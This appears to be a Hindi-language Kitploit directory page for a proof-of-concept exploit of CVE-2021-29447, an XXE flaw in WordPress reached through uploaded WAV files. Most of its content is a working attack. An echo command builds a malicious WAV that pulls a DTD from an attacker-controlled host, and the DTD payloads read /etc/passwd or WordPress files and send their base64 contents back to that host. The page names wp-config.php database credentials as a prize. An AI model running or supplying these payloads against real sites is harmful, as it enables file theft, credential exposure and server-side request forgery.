Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-29447 — CVE-2021-29447 के लिए प्रमाण-की-अवधारणा शोषण, एक WordPress XXE भेद्यता जो क्राफ्टेड WAV फ़ाइलों के माध्यम से मनमाना फ़ाइल प्रकटीकरण और SSRF सक्षम करती है। | Kitploit
उपकरण/GitHubGitHub/assassinukg/cve-2021-29447
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubassassinukg/cve-2021-29447

CVE-2021-29447

CVE-2021-29447 के लिए प्रमाण-की-अवधारणा शोषण, एक WordPress XXE भेद्यता जो क्राफ्टेड WAV फ़ाइलों के माध्यम से मनमाना फ़ाइल प्रकटीकरण और SSRF सक्षम करती है।

रिपॉजिटरी देखें
15 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-29447

प्रभाव

मनमाना फ़ाइल प्रकटीकरण: होस्ट के फ़ाइल सिस्टम पर किसी भी फ़ाइल की सामग्री प्राप्त की जा सकती है, जैसे wp-config.php जिसमें डेटाबेस क्रेडेंशियल जैसी संवेदनशील जानकारी होती है। सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF): WordPress इंस्टॉलेशन की ओर से HTTP अनुरोध किए जा सकते हैं। वातावरण के आधार पर, इसके गंभीर परिणाम हो सकते हैं। कमजोरी का शोषण करना

इस कमजोरी से प्रभावित एक वर्डप्रेस साइट की पहचान wpscan टूल की सहायता से गणना प्रक्रिया में की गई है।

image

एक दुर्भावनापूर्ण WAV फ़ाइल बनाना

यह बहुत आसान है, अपने bash कंसोल में

nano poc.wav echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

अपने हमलावर पीसी पर एक dtd बनाएं जिसमें कोड वेब सर्वर पर निष्पादित हो।

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

नोट: वर्डप्रेस फ़ाइलें पढ़ने के लिए सिंटैक्स "../WP-FILE.php" का उपयोग करें

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

फ़ाइलों की निर्देशिका के लिए एक python सर्वर होस्ट करें (python3 -m http.server 8081)

Ref:

https://github.com/motikan2010/CVE-2021-29447 https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5

टूल डाउनलोड करें